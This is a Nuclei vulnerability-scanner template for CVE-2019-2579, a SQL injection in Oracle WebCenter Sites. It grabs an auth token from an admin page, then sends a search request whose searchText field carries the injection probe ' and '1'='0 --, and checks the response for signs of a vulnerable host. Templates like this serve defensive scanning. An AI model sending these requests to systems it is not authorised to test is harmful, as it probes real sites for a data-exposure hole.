51 lines
1.7 KiB
YAML
51 lines
1.7 KiB
YAML
id: CVE-2019-2579
|
|
|
|
info:
|
|
name: Oracle WebCenter Sites - SQL Injection
|
|
author: leovalcante
|
|
severity: medium
|
|
description: Vulnerability in the Oracle WebCenter Sites component of Oracle Fusion Middleware. The supported version that is affected is 12.2.1.3.0. Easily exploitable vulnerability allows low privileged attacker
|
|
with network access via HTTP to compromise Oracle WebCenter Sites. Successful attacks of this vulnerability can result in unauthorized read access to a subset of Oracle WebCenter Sites accessible data.
|
|
reference:
|
|
- https://outpost24.com/blog/Vulnerabilities-discovered-in-Oracle-WebCenter-Sites
|
|
- https://github.com/Leovalcante/wcs_scanner
|
|
classification:
|
|
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N
|
|
cvss-score: 4.3
|
|
cve-id: CVE-2019-2579
|
|
tags: cve,cve2019,oracle,wcs,sqli
|
|
|
|
requests:
|
|
- raw:
|
|
- |
|
|
GET /cs/Satellite?pagename=OpenMarket/Xcelerate/Admin/WebReferences HTTP/1.1
|
|
Host: {{Hostname}}
|
|
|
|
- |
|
|
POST /cs/ContentServer HTTP/1.1
|
|
Host: {{Hostname}}
|
|
Content-Type: application/x-www-form-urlencoded
|
|
|
|
_authkey_={{authkey}}&pagename=OpenMarket%2FXcelerate%2FAdmin%2FWebReferences&op=search&urlsToDelete=&resultsPerPage=25&searchChoice=webroot&searchText=%27+and+%271%27%3D%270+--+
|
|
|
|
cookie-reuse: true
|
|
extractors:
|
|
- type: regex
|
|
name: authkey
|
|
part: body
|
|
internal: true
|
|
group: 1
|
|
regex:
|
|
- "NAME='_authkey_' VALUE='([0-9A-Z]+)'>"
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
words:
|
|
- "value='' and '1'='0 --"
|
|
- "Use this utility to view and manage URLs"
|
|
condition: and
|
|
|
|
- type: status
|
|
status:
|
|
- 200 |